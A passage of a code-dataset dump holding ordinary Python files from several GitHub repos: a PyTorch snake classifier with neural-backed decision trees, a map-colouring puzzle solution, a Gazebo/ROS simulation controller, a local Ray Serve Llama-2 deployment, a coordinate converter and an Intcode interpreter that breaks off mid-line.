params_to_update.append(param)\n # print(\"\\t\",name)\n else:\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n a=1 # print(\"\\t\",name)\n \n return params_to_update\n\ndef run_model(data_cfg, model_cfg, criterion):\n '''\n Runs model based on parameters from data_cfg and model_cfg. Additionally, writes best model's weights to a path in config\n '''\n \n # create dataloaders\n dataloaders_dict, num_classes = create_dataloaders(\n data_cfg['dataDir'],\n model_cfg['batchSize'],\n model_cfg['inputSize']\n )\n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Initialize the model for this run\n model_ft, input_size = initialize_model(\n model_cfg['modelName'],\n num_classes,\n feature_extract = model_cfg['featureExtract'],\n use_pretrained=True\n )\n\n model_ft = model_ft.to(device) # make model use GPU\n\n params_update = params_to_update(model_ft, model_cfg['featureExtract'])\n\n # Optimizer\n optimizer_ft = optim.Adam(params_update, lr=model_cfg['lr'])\n \n # train model\n model_ft, loss_train, acc_train, fs_train, loss_val, acc_val, fs_val = train_model(\n model_ft,\n dataloaders_dict,\n criterion,\n optimizer = optimizer_ft,\n num_epochs = model_cfg['nEpochs'])\n \n # save model\n save_model(model_ft, data_cfg, model_cfg)\n \n return model_ft, loss_train, acc_train, fs_train, loss_val, acc_val, fs_val \n \ndef save_model(model_ft, data_cfg, model_cfg):\n '''\n saves weights of a passed model\n '''\n # save model to model states in params\n now = datetime.now().strftime(\"%d%m%Y_%H:%M\")\n model_path = os.path.join(data_cfg['dataDir'], \"model_states\")\n model_name = os.path.join(\n model_path, \n \"{}_{}_{}.pth\".format(\n now,\n model_cfg['nEpochs'],\n model_cfg['modelName']\n )\n )\n if not os.path.isdir(model_path): # make sure model path is made\n print(\"---> Creating {}\".format(model_path))\n os.mkdir(model_path)\n \n # saves model\n print('---> saving model at {}/{}'.format(model_path, model_name))\n torch.save(model_ft.state_dict(), model_name)\n \n \ndef run_nbdt(data_cfg, model_cfg, loss_type):\n '''\n Runs nbdt \n '''\n # check to make sure loss_type is specified\n assert (\n loss_type in [\"SoftTreeSupLoss\", \"HardTreeSupLoss\"]\n ), \"Please specify SoftTreeSupLoss or HardTreeSupLoss\"\n \n # create dataloaders\n dataloaders_dict, num_classes = create_dataloaders(\n data_cfg['dataDir'],\n model_cfg['batchSize'],\n model_cfg['inputSize']\n )\n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Initialize the model for this run\n model, input_size = initialize_model(\n model_cfg['modelName'],\n num_classes,\n feature_extract = model_cfg['featureExtract'],\n use_pretrained=True\n ) \n \n # load model weights\n if loss_type == \"SoftTreeSupLoss\":\n model_weights = torch.load(data_cfg['hierarchyModelPath'])\n elif loss_type == \"HardTreeSupLoss\":\n model_weights = torch.load(data_cfg['hierarchyModelPath'])\n \n model = model.to(device) # make model use GPU\n model.load_state_dict(model_weights)\n \n # create NBDT\n print('---> Creating NBDT...')\n if loss_type == \"SoftTreeSupLoss\":\n model = SoftNBDT(\n model = model,\n dataset = 'snakes', \n hierarchy='induced-densenet121',\n path_graph = os.path.join(data_cfg['hierarchyPath'], data_cfg['hierarchyJSON']),\n path_wnids = data_cfg['wnidPath']\n )\n else:\n model = HardNBDT(\n model = model,\n dataset = 'snakes', \n hierarchy='induced-densenet121',\n path_graph = os.path.join(data_cfg['hierarchyPath'], data_cfg['hierarchyJSON']),\n path_wnids = data_cfg['wnidPath']\n )\n print('---> Finished creating NBDT.')\n \n model.eval()\n\n running_corrects = 0\n fscore = []\n\n print('---> Running inference...')\n # iterate over data\n for inputs, labels in dataloaders_dict['valid_snakes_r1']:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n with torch.no_grad():\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n\n # statistics\n labels_cpu = labels.cpu().numpy()\n predictions_cpu = preds.cpu().numpy()\n Fscore = f1_score(labels_cpu, predictions_cpu, average='macro')\n fscore.append(Fscore)\n running_corrects += torch.sum(preds == labels.data)\n print('---> Finished running inference...')\n \n epoch_acc = running_corrects.double() / len(dataloaders_dict['valid_snakes_r1'].dataset)\n epoch_fscore = np.average(np.array(fscore))\n \n print(\" \")\n print('{} Acc: {:.4f} F1: {:.4f}'.format('NBDT Test', epoch_acc, epoch_fscore))\n print(\" \")","repo_name":"nikolettuce/SnakeClassification_NeuralBackedDecisionTrees","sub_path":"src/model/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":12228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"74241585004","text":"# https://py.checkio.org/ru/mission/color-map/\n# my solution\n# not sure if it's the right solution\n\ndef color_map(region):\n n, m, graph, vertices = len(region), len(region[0]), dict(), set()\n for line in region:\n vertices = vertices | set(line)\n for vertex in vertices:\n graph[vertex] = set()\n\n def cell(row, col):\n return region[row][col] if 0 <= row < n and 0 <= col < m else None\n\n def add_edge(v1, v2):\n if v2 is not None and v1 != v2:\n graph[v1].add(v2)\n graph[v2].add(v1)\n\n for i in range(n):\n for j in range(m):\n vertex, right_neighbor, bottom_neighbor = region[i][j], cell(i, j + 1), cell(i + 1, j)\n add_edge(vertex, right_neighbor)\n add_edge(vertex, bottom_neighbor)\n\n def dfs(vert, clr):\n used.add(vert)\n if not colored_vertices[vert] and all((colored_vertices[neighbor] != clr for neighbor in graph[vert])):\n colored_vertices[vert] = clr\n for neighbor in graph[vert]:\n if neighbor not in used:\n dfs(neighbor, clr)\n\n colored_vertices = {vertex: None for vertex in vertices}\n for color in range(1, 5):\n used = set()\n for vertex in vertices:\n if not colored_vertices[vertex]:\n dfs(vertex, color)\n\n return list(colored_vertices.values())\n\n\ndef color_graph(g):\n def dfs(vert, clr):\n used.add(vert)\n if not colored_vertices[vert] and all((colored_vertices[neighbor] != clr for neighbor in g[vert])):\n colored_vertices[vert] = clr\n for neighbor in g[vert]:\n if neighbor not in used:\n dfs(neighbor, clr)\n\n colored_vertices = {vertex: None for vertex in g}\n for color in range(1, 5):\n used = set()\n for vertex in g:\n if not colored_vertices[vertex]:\n dfs(vertex, color)\n\n return list(colored_vertices.values())\n\n\n# best clear solution\n# https://py.checkio.org/mission/color-map/publications/DiZ/python-3/borders/?ordering=most_voted&filtering=all\ndef color_map_bc(colored_map):\n # Construct all regions\n regions = {}\n for i, line in enumerate(colored_map):\n for j, cell in enumerate(line):\n regions.setdefault(cell, set()).add(i + 1j * j)\n\n # Get neighbours for all regions\n neighbours = {}\n for region, cells in regions.items():\n border = set.union(*({c + 1j ** k for k in range(4)} for c in cells)) - cells\n neighbours[region] = {r for r, c in regions.items() if border & c}\n\n # Color each region with first available color\n c, colors = 0, [0] * len(regions)\n while c < len(regions):\n variants = set(range(colors[c] + 1, 5)) - {colors[n] for n in neighbours[c]}\n colors[c] = len(variants) and min(variants)\n c += 2 * bool(variants) - 1\n return colors\n\n\ndef test0():\n v_s = set()\n r = ((5, 2, 3, 1, 1, 1, 1, 1, 1),\n (0, 2, 2, 2, 2, 2, 2, 1, 4),\n (0, 2, 2, 2, 4, 4, 4, 4, 4),\n (0, 6, 6, 7, 8, 8, 8, 8, 8),\n (0, 7, 7, 7, 7, 8, 8, 8, 8))\n\n for rw in r:\n v_s = v_s | set(rw)\n\n print(v_s)\n print(color_map(r))\n\n\ndef test1():\n print(color_map(((0, 0, 0, 1, 4, 4, 4, 4, 4),\n (0, 1, 1, 1, 3, 3, 3, 3, 4),\n (0, 1, 1, 3, 3, 6, 5, 3, 4),\n (1, 1, 1, 3, 2, 6, 5, 5, 9),\n (1, 1, 1, 2, 2, 6, 6, 6, 9),\n (7, 8, 9, 9, 9, 9, 9, 9, 9),\n (7, 8, 8, 8, 8, 8, 8, 8, 8),\n (7, 7, 7, 7, 7, 7, 7, 7, 7))))\n\n regions = ((13, 13, 13, 13, 13, 13, 14, 14, 14, 14,),\n (13, 0, 0, 1, 1, 2, 2, 3, 3, 14,),\n (13, 4, 5, 5, 6, 6, 7, 7, 8, 14,),\n (13, 9, 9, 10, 10, 11, 11, 12, 12, 14,),\n (13, 13, 13, 13, 14, 14, 14, 14, 14, 14,),)\n print(color_map(regions))\n print('bc:', color_map_bc(regions))\n\n\ndef test3():\n g = {1: {2, 4, 5, 3, 13},\n 2: {1, 4, 7, 3},\n 3: {2, 7, 8, 11, 1},\n 4: {1, 2, 5, 6, 7},\n 5: {1, 4, 6, 12, 13, 11},\n 6: {5, 4, 7, 10, 12, 2},\n 7: {2, 3, 8, 10, 6, 4, 9},\n 8: {3, 9, 7, 11},\n 9: {8, 10, 11, 7},\n 10: {7, 9, 11, 12, 6},\n 11: {13, 12, 10, 9, 3, 5, 8},\n 12: {6, 5, 10, 11, 13},\n 13: {11, 12, 5, 1}}\n print('t3: ', color_graph(g))\n\n\nif __name__ == '__main__':\n test_funcs = [test0, test1, test3]\n for test in test_funcs:\n test()\n","repo_name":"diwert-ai/Problems","sub_path":"Problems/Checkio/Simple/color map.py","file_name":"color map.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31165802282","text":"#!/usr/bin/env python3\n\nimport traceback\nfrom typing import List\nfrom typing import Tuple\nfrom typing import Dict\nimport time\nimport gazebo_msgs\nimport gazebo_msgs.srv\nimport rosgraph_msgs\n\nimport rospy\nfrom std_srvs.srv import Empty\n\nfrom lr_gym.envControllers.RosEnvController import RosEnvController\nfrom lr_gym.envControllers.JointEffortEnvController import JointEffortEnvController\nfrom lr_gym.envControllers.SimulatedEnvController import SimulatedEnvController \nfrom lr_gym.utils.utils import JointState, LinkState, RequestFailError\nimport os\nimport lr_gym.utils.dbg.ggLog as ggLog\nfrom lr_gym.utils.utils import Pose\nfrom lr_gym.utils.gazebo_models_manager import delete_model, spawn_model\n\n\nclass GazeboControllerNoPlugin(RosEnvController, JointEffortEnvController, SimulatedEnvController):\n \"\"\"This class allows to control the execution of a Gazebo simulation.\n\n It only uses the default gazebo plugins which are usually included in the installation.\n Because of this the duration of the simulation steps may not be accurate and simulation\n speed is low due to communication overhead.\n \"\"\"\n\n def __init__( self,\n usePersistentConnections : bool = False,\n stepLength_sec : float = 0.001,\n rosMasterUri : str = None):\n \"\"\"Initialize the Gazebo controller.\n\n Parameters\n ----------\n usePersistentConnections : bool\n Controls wheter to use persistent connections for the gazebo services.\n IMPORTANT: enabling this seems to create problems with the synchronization\n of the service calls. This breaks the pause/unpause/reset order and\n leads to deadlocks\n In theory it should have been fine as long as there are no connection\n problems and gazebo does not restart.\n\n Raises\n -------\n ROSException\n If it fails to find the gazebo services\n\n \"\"\"\n super().__init__()\n\n self._stepLength_sec = stepLength_sec\n self._lastUnpausedTime = 0\n self._episodeIntendedSimDuration = 0\n self._episodeWallStartTime = 0\n self._totalRenderTime = 0\n self._stepsTaken = 0\n\n self._lastStepRendered = None\n self._lastRenderResult = None\n self._usePersistentConnections = usePersistentConnections\n\n self._rosMasterUri = rosMasterUri\n\n def _makeRosConnections(self):\n serviceNames = {\"applyJointEffort\" : \"/gazebo/apply_joint_effort\",\n \"clearJointEffort\" : \"/gazebo/clear_joint_forces\",\n \"getJointProperties\" : \"/gazebo/get_joint_properties\",\n \"getLinkState\" : \"/gazebo/get_link_state\",\n \"pause\" : \"/gazebo/pause_physics\",\n \"unpause\" : \"/gazebo/unpause_physics\",\n \"get_physics_properties\" : \"/gazebo/get_physics_properties\",\n \"reset\" : \"/gazebo/reset_simulation\",\n \"setLinkState\" : \"/gazebo/set_link_state\",\n \"setLightProperties\" : \"/gazebo/set_light_properties\"}\n\n timeout_secs = 30.0\n for serviceName in serviceNames.values():\n try:\n rospy.loginfo(\"waiting for service \"+serviceName+\" ...\")\n rospy.wait_for_service(serviceName)\n rospy.loginfo(\"got service \"+serviceName)\n except rospy.ROSException as e:\n rospy.logfatal(\"Failed to wait for service \"+serviceName+\". Timeouts were \"+str(timeout_secs)+\"s. Exception = \"+str(e))\n raise\n except rospy.ROSInterruptException as e:\n rospy.logfatal(\"Interrupeted while waiting for service \"+serviceName+\". Exception = \"+str(e))\n raise\n\n self._applyJointEffortService = rospy.ServiceProxy(serviceNames[\"applyJointEffort\"], gazebo_msgs.srv.ApplyJointEffort, persistent=self._usePersistentConnections)\n self._clearJointEffortService = rospy.ServiceProxy(serviceNames[\"clearJointEffort\"], gazebo_msgs.srv.JointRequest, persistent=self._usePersistentConnections)\n self._getJointPropertiesService = rospy.ServiceProxy(serviceNames[\"getJointProperties\"], gazebo_msgs.srv.GetJointProperties, persistent=self._usePersistentConnections)\n self._getLinkStateService = rospy.ServiceProxy(serviceNames[\"getLinkState\"], gazebo_msgs.srv.GetLinkState, persistent=self._usePersistentConnections)\n self._pauseGazeboService = rospy.ServiceProxy(serviceNames[\"pause\"], Empty, persistent=self._usePersistentConnections)\n self._unpauseGazeboService = rospy.ServiceProxy(serviceNames[\"unpause\"], Empty, persistent=self._usePersistentConnections)\n self._getPhysicsProperties = rospy.ServiceProxy(serviceNames[\"get_physics_properties\"], gazebo_msgs.srv.GetPhysicsProperties, persistent=self._usePersistentConnections)\n self._resetGazeboService = rospy.ServiceProxy(serviceNames[\"reset\"], Empty, persistent=self._usePersistentConnections)\n self._setLinkStateService = rospy.ServiceProxy(serviceNames[\"setLinkState\"], gazebo_msgs.srv.SetLinkState, persistent=self._usePersistentConnections)\n self._setLightPropertiesService = rospy.ServiceProxy(serviceNames[\"setLightProperties\"], gazebo_msgs.srv.SetLightProperties, persistent=self._usePersistentConnections)\n\n #self._setGazeboPhysics = rospy.ServiceProxy(self._setGazeboPhysics, SetPhysicsProperties, persistent=self._usePersistentConnections)\n\n # Crete a publisher to manually send clock messages (used in reset, very ugly, sorry)\n self._clockPublisher = rospy.Publisher(\"/clock\", rosgraph_msgs.msg.Clock, queue_size=1)\n\n\n def startController(self):\n \"\"\"Start up the controller. This must be called after setCamerasToObserve, setLinksToObserve and setJointsToObserve.\"\"\"\n\n super().startController()\n\n self._makeRosConnections()\n\n\n rospy.loginfo(\"ROS time is \"+str(rospy.get_time())+\" pid = \"+str(os.getpid()))\n self.pauseSimulation()\n self.resetWorld()\n\n def _callService(self,serviceProxy : rospy.ServiceProxy) -> bool:\n \"\"\"Call the provided service. It retries in case of failure and handles exceptions. Returns false if the call failed.\n\n Parameters\n ----------\n serviceProxy : rospy.ServiceProxy\n ServiceProxy for the service to be called\n\n Returns\n -------\n bool\n True if the service was called, false otherwise\n\n \"\"\"\n done = False\n counter = 0\n maxRetry = 10\n while not done and not rospy.is_shutdown():\n if counter < maxRetry:\n try:\n serviceProxy.call()\n done = True\n except rospy.ServiceException as e:\n rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call failed: \"+traceback.format_exc(e))\n except rospy.ROSInterruptException as e:\n rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call interrupted: \"+traceback.format_exc(e))\n counter+=maxRetry #don't retry\n except rospy.ROSSerializationException as e:\n rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call failed to serialize: \"+traceback.format_exc(e))\n counter += 1\n else:\n rospy.logerr(\"Failed to call service\")\n break\n return done\n\n def pauseSimulation(self) -> bool:\n \"\"\"Pause the simulation.\n\n Returns\n -------\n bool\n True if the simulation was paused, false in case of failure\n\n \"\"\"\n ret = self._callService(self._pauseGazeboService)\n #rospy.loginfo(\"paused sim\")\n self._lastUnpausedTime = rospy.get_time()\n return ret\n\n def unpauseSimulation(self) -> bool:\n \"\"\"Unpause the simulation.\n\n Returns\n -------\n bool\n True if the simulation was paused, false in case of failure\n\n \"\"\"\n t = rospy.get_time()\n if self._lastUnpausedTime>t:\n rospy.logwarn(\"Simulation time increased since last pause! (time diff = \"+str(t-self._lastUnpausedTime)+\"s)\")\n ret = self._callService(self._unpauseGazeboService)\n #rospy.loginfo(\"unpaused sim\")\n return ret\n\n def isPaused(self):\n return self._getPhysicsProperties.call().pause\n \n def resetWorld(self) -> bool:\n \"\"\"Reset the world to its initial state.\n\n Returns\n -------\n bool\n True if the simulation was paused, false in case of failure\n\n \"\"\"\n self.pauseSimulation()\n totalEpSimDuration = self.getEnvSimTimeFromStart()\n\n ret = self._callService(self._resetGazeboService)\n\n self._lastUnpausedTime = 0\n\n # ggLog.info(f\"totalEpSimDuration = {totalEpSimDuration}\")\n # ggLog.info(f\"self._episodeIntendedSimDuration = {self._episodeIntendedSimDuration}\")\n totalSimTimeError = totalEpSimDuration - self._episodeIntendedSimDuration\n if abs(totalSimTimeError)>=0.1:\n rospy.logwarn(\"Episode error in simulation time keeping = \"+str(totalSimTimeError)+\"s (This is just an upper bound, may actually be fine)\")\n\n # totalEpRealDuration = time.time() - self._episodeWallStartTime\n # if self._episodeRealSimDuration!=0:\n # ratio = float(totalEpSimDuration)/self._episodeRealSimDuration\n # else:\n # ratio = -1\n # if totalEpRealDuration!=0:\n # totalRatio = float(totalEpSimDuration)/totalEpRealDuration\n # else:\n # totalRatio = -1\n # if totalEpSimDuration!=0:\n # rospy.loginfo( \"Duration: sim={:.3f}\".format(totalEpSimDuration)+\n # \" real={:.3f}\".format(totalEpRealDuration)+\n # \" sim/real={:.3f}\".format(totalRatio)+ # Achieved sim/real time ratio\n # \" step-time-only ratio ={:.3f}\".format(ratio)+ #This would be the sim/real time ratio if there was no overhead for sending actions and getting observations\n # \" totalRenderTime={:.4f}\".format(self._totalRenderTime)+\n # \" realFps={:.2f}\".format(self._stepsTaken/totalEpRealDuration)+\n # \" simFps={:.2f}\".format(self._stepsTaken/totalEpSimDuration))\n self._episodeIntendedSimDuration = 0\n self._episodeWallStartTime = time.time()\n self._totalRenderTime = 0\n self._stepsTaken = 0\n\n # Reset the time manually. Incredibly ugly, incredibly effective\n t = rosgraph_msgs.msg.Clock()\n self._clockPublisher.publish(t)\n\n\n\n #rospy.loginfo(\"resetted sim\")\n return ret\n\n\n def step(self) -> float:\n \"\"\"Run the simulation for the specified time.\n\n It unpauses and the simulation, sleeps and then pauses it back. It may not be precise.\n\n Parameters\n ----------\n runTime_secs : float\n Time to run the simulation for, in seconds\n\n Returns\n -------\n None\n\n\n Raises\n -------\n ExceptionName\n Why the exception is raised.\n\n \"\"\"\n\n t0_real = time.time()\n t0 = rospy.get_time()\n self.unpauseSimulation()\n t1 = rospy.get_time()\n rospy.sleep(self._stepLength_sec)\n t2 = rospy.get_time()\n self.pauseSimulation()\n t3 = rospy.get_time()\n tf_real = time.time()\n self._episodeIntendedSimDuration += t3 - t0\n rospy.loginfo(\"t0 = \"+str(t0)+\" t3 = \"+str(t3))\n rospy.loginfo(\"Unpaused for a duration between \"+str(t2-t1)+\"s and \"+str(t3-t0)+\"s\")\n\n self._stepsTaken+=1\n\n return self._stepLength_sec\n\n\n\n\n def setJointsEffortCommand(self, jointTorques : List[Tuple[str,str,float]]) -> None:\n for command in jointTorques:\n jointName = command[1]\n torque = command[2]\n duration_secs = self._stepLength_sec\n secs = int(duration_secs)\n nsecs = int((duration_secs - secs) * 1000000000)\n\n request = gazebo_msgs.srv.ApplyJointEffortRequest()\n request.joint_name = jointName\n request.effort = torque\n request.duration.secs = secs\n request.duration.nsecs = nsecs\n res = self._applyJointEffortService.call(request)\n if not res.success:\n rospy.logerror(\"Failed applying effort for joint \"+jointName+\": \"+res.status_message)\n\n\n def getJointsState(self, requestedJoints : List[Tuple[str,str]]) -> Dict[Tuple[str,str],JointState]:\n #ggLog.info(\"GazeboControllerNoPlugin.getJointsState() called\")\n gottenJoints = {}\n missingJoints = []\n for joint in requestedJoints:\n jointName = joint[1]\n modelName = joint[0]\n\n gotit = False\n tries = 0\n while not gotit and tries <10:\n jointProp = self._getJointPropertiesService.call(jointName) ## TODO: this ignores the model name!\n #ggLog.info(\"Got joint prop for \"+jointName+\" = \"+str(jointProp))\n gotit = jointProp.success\n tries+=1\n if gotit:\n jointState = JointState(list(jointProp.position), list(jointProp.rate), None) #NOTE: effort is not returned by the gazeoo service\n gottenJoints[(modelName,jointName)] = jointState\n else:\n missingJoints.append(joint)\n # err = \"GazeboControllerNoPlugin: Failed to get state for joint '\"+str(jointName)+\"' of model '\"+str(modelName)+\"'\"\n # ggLog.error(err)\n # raise RuntimeError(err)\n\n if len(missingJoints)>0:\n err = f\"Failed to get state for joints {missingJoints}. requested {requestedJoints}\"\n # rospy.logerr(err)\n raise RequestFailError(message=err, partialResult=gottenJoints)\n\n\n return gottenJoints\n\n\n\n def getLinksState(self, requestedLinks : List[Tuple[str,str]]) -> Dict[Tuple[str,str],LinkState]:\n gottenLinks = {}\n missingLinks = []\n for link in requestedLinks:\n linkName = link[0]+\"::\"+link[1]\n resp = self._getLinkStateService.call(link_name=linkName)\n\n if resp.success:\n linkState = LinkState( position_xyz = (resp.link_state.pose.position.x, resp.link_state.pose.position.y, resp.link_state.pose.position.z),\n orientation_xyzw = (resp.link_state.pose.orientation.x, resp.link_state.pose.orientation.y, resp.link_state.pose.orientation.z, resp.link_state.pose.orientation.w),\n pos_velocity_xyz = (resp.link_state.twist.linear.x, resp.link_state.twist.linear.y, resp.link_state.twist.linear.z),\n ang_velocity_xyz = (resp.link_state.twist.angular.x, resp.link_state.twist.angular.y, resp.link_state.twist.angular.z))\n\n gottenLinks[link] = linkState\n else:\n # err = f\"Failed to get Link state for link {linkName}: resp = {resp}\"\n # ggLog.warn(err)\n # world_props = rospy.ServiceProxy(\"/gazebo/get_world_properties\", gazebo_msgs.srv.GetWorldProperties)()\n # ggLog.error(f\"World properties are: {world_props}\")\n # model_props = rospy.ServiceProxy(\"/gazebo/get_model_properties\", gazebo_msgs.srv.GetModelProperties)(model_name=link[0])\n # ggLog.error(f\"Model '{link[0]}' properties are: {model_props}\")\n missingLinks.append(link) \n \n if len(missingLinks)>0:\n err = f\"Failed to get state for links {missingLinks}. requested {requestedLinks}\"\n # rospy.logerr(err)\n raise RequestFailError(message=err, partialResult=gottenLinks)\n \n return gottenLinks\n\n def getEnvSimTimeFromStart(self) -> float:\n return rospy.get_time()\n\n\n def setRosMasterUri(self, rosMasterUri : str):\n self._rosMasterUri = rosMasterUri\n\n def spawnModel(self, xacro_file_path : str,\n pose : Pose = Pose(0,0,0,0,0,0,1), \n args : Dict[str,str] = {}, \n model_name = \"model\", \n robot_namespace = \"\", \n reference_frame = \"world\",\n format = \"urdf\"):\n \"\"\"Spawn a model in the environment, arguments depend on the type of SimulatedEnvController\n \"\"\"\n spawn_model(xacro_file_path = xacro_file_path,\n pose = pose, \n args = args, \n model_name = model_name, \n robot_namespace = robot_namespace, \n reference_frame = reference_frame,\n format = format)\n\n\n def deleteModel(self, model : str):\n \"\"\"Delete a model from the environment\"\"\"\n delete_model(model_name=model)\n\n\n def setJointsStateDirect(self, jointStates : Dict[Tuple[str,str],JointState]):\n \"\"\"Set the state for a set of joints\n\n Parameters\n ----------\n jointStates : Dict[Tuple[str,str],JointState]\n Keys are in the format (model_name, joint_name), the value is the joint state to enforce\n \"\"\"\n raise NotImplementedError()\n \n\n def setLinksStateDirect(self, linksStates : Dict[Tuple[str,str],LinkState]):\n \"\"\"Set the state for a set of links\n\n Parameters\n ----------\n linksStates : Dict[Tuple[str,str],LinkState]\n Keys are in the format (model_name, link_name), the value is the link state to enforce\n \"\"\"\n \n ret = {}\n for item in linksStates.items():\n linkName = item[0][1]\n modelName = item[0][0]\n linkState = item[1]\n req = gazebo_msgs.srv.SetLinkStateRequest()\n req.link_state = gazebo_msgs.msg.LinkState()\n req.link_state.link_name = modelName+\"::\"+linkName\n req.link_state.reference_frame = \"world\"\n req.link_state.pose = linkState.pose.getPoseStamped(frame_id = \"world\").pose\n req.link_state.twist.linear.x = linkState.pos_velocity_xyz[0]\n req.link_state.twist.linear.y = linkState.pos_velocity_xyz[1]\n req.link_state.twist.linear.z = linkState.pos_velocity_xyz[2]\n req.link_state.twist.angular.x = linkState.ang_velocity_xyz[0]\n req.link_state.twist.angular.y = linkState.ang_velocity_xyz[1]\n req.link_state.twist.angular.z = linkState.ang_velocity_xyz[2]\n\n #print(req)\n #print(type(req))\n resp = self._setLinkStateService(req)\n \n if not resp.success:\n ggLog.error(\"Failed setting link state for link \"+modelName+\"::\"+linkName+\": \"+resp.status_message)\n # else:\n # ggLog.info(\"Successfully set Linkstate for link \"+modelName+\"::\"+linkName)\n return ret\n\n def freerun(self, duration_sec : float):\n wasPaused = self.isPaused()\n if wasPaused:\n self.unpauseSimulation()\n rospy.sleep(duration_sec)\n if wasPaused:\n self.pauseSimulation()\n\n \n def setupLight(self, gz_req : gazebo_msgs.srv.SetLightPropertiesRequest):\n res = self._setLightPropertiesService.call(gz_req)\n if not res.success:\n ggLog.error(f\"GazeboControllerNoPlugin: failed to setup Light.\\n req = {gz_req}\\n res={res}\")\n return False\n return True","repo_name":"c-rizz/lr_gym","sub_path":"lr_gym/src/lr_gym/envControllers/GazeboControllerNoPlugin.py","file_name":"GazeboControllerNoPlugin.py","file_ext":"py","file_size_in_byte":19753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"71459097643","text":"# from transformers import AutoTokenizer\nmodel_name = \"michaelfeil/ct2fast-Llama-2-7b-hf\"\n\nfrom hf_hub_ctranslate2 import GeneratorCT2fromHfHub\nimport requests\nfrom starlette.requests import Request\nfrom typing import Dict\n\nfrom ray import serve\n\n@serve.deployment(route_prefix=\"/serve/llama7b\")\nclass Llama7BDeployment:\n def __init__(self):\n self.model = GeneratorCT2fromHfHub(\n model_name_or_path=model_name,\n device=\"cpu\",\n compute_type=\"int8\",\n )\n\n async def __call__(self, request: Request) -> Dict:\n # Extracting the message from the request's JSON body\n json_data = await request.json()\n message = json_data.get(\"message\", \"\")\n\n outputs = self.model.generate(\n text=[message],\n max_length=128,\n include_prompt_in_result=False\n )\n \n # I noticed you returned {\"result\": self._msg} which would cause an error since self._msg is not defined.\n # Assuming you want to return the generated outputs:\n return {\"result\": outputs}\n\napp = Llama7BDeployment.bind()\n\n# 2: Deploy the application locally.\nserve.run(app)\n\nimport requests\n\n# Define the URL for the endpoint\nurl = \"http://localhost:8000/serve/llama7b\"\n\n# Define the payload\ndata = {\n \"message\": \"Your input text here\"\n}\n\n# Send a POST request\nresponse = requests.post(url, json=data)\n\n# Print the response\nprint(response.json())\n\n","repo_name":"JinL0/ray-serve-llama","sub_path":"llama2_7b.py","file_name":"llama2_7b.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28170118824","text":"import StringUtilities\n\nclass CoordinatesService:\n a = 1\n\ndef DMSToDecimalDegrees(DMSString):\n if(StringUtilities.isBlank(DMSString)):\n return \"\"\n\n values = DMSString.split(\" \")\n seconds, direction = values[2][0:len(values[2]) - 1], values[2][-1]\n TheLatitudeValue = float(values[0]) + ((float(values[1])) / 60) + ((float(seconds)) / 3600)\n\n if (direction == \"W\" or direction == \"S\"):\n TheLatitudeValue = 0 - TheLatitudeValue\n\n return TheLatitudeValue","repo_name":"UdaySaiTyada/GeoSpatialRendering","sub_path":"CoordinatesService.py","file_name":"CoordinatesService.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26729174693","text":"def make_operation (input):\n opcode = \"\"\n param1Mode = False\n param2Mode = False\n param3Mode = False\n\n parsed = list(str(input))\n parsed.reverse()\n\n idx = 0\n while idx < len(parsed):\n comp = parsed[idx]\n if idx == 0:\n opcode = comp\n elif idx == 1:\n opcode = comp + opcode\n elif idx == 2:\n if comp == \"1\":\n param1Mode = True\n elif idx == 3:\n if comp == \"1\":\n param2Mode = True\n elif idx == 4:\n if comp == \"1\":\n param3Mode = True\n idx +=1\n\n\n return [int(opcode), param1Mode, param2Mode, param3Mode]\n\ndef get_value (input, index, mode):\n if mode == False:\n return instructions[index]\n else:\n return index\n\ndef get_dest (input, index, mode):\n return index\n\ninstructions = []\n\nwith open('input.txt', 'r') as file:\n data = file.read()\n instructions = list(map(int, data.split(\",\")))\n\n# 1 - Add next two integers together, store in 3rd\n# 2 - Multiply two integers together, store in 3rd\n# 3 - Store input at address\n# 4 - Output value at address\n# 99 - End\n\ninput = 1\noutput = 0\n\nidx = 0\n\nprint(\"Have instructions\", len(instructions))\n\n# instructions[1] = 12\n# instructions[2] = 2\n\n\n\nwhile idx < len(instructions):\n raw = instructions[idx]\n print(\"Raw {}\".format(raw))\n\n operation = make_operation(raw)\n\n val = operation[0]\n param1Mode = operation[1]\n param2Mode = operation[2]\n param3Mode = operation[3]\n\n if val == 1:\n sl = instructions[idx + 1: idx + 4]\n print(\"Add slice {}\".format(sl))\n # print(\"Slice\", sl)\n # print(instructions[idx:idx+10])\n p1 = get_value(instructions, sl[0], param1Mode)\n p2 = get_value(instructions, sl[1], param2Mode)\n newval = p1 + p2\n # dest = sl[2]\n dest = get_dest(instructions, sl[2], param3Mode)\n instructions[dest] = newval\n idx += 4\n elif val == 2:\n sl = instructions[idx + 1: idx + 4]\n print(\"Mul slice {}\".format(sl))\n p1 = get_value(instructions, sl[0], param1Mode)\n p2 = get_value(instructions, sl[1], param2Mode)\n newval = p1 * p2\n # dest = sl[2]\n dest = get_dest(instructions, sl[2], param3Mode)\n instructions[dest] = newval\n idx += 4\n elif val == 3:\n dest = get_dest(instructions, instructions[idx+1], param1Mode)\n instructions[dest] = input\n print(\"Input set {} to value {}\".format(dest, input))\n idx += 2\n elif val == 4:\n val = instructions[idx+1] if param1Mode else instructions[instructions[idx+1]]\n output = val\n print(\"Output set {} to value {}\".format(dest, output))\n\n idx += 2\n else:\n print(\"Breaking at val {}\".format(val))\n break\n\nprint 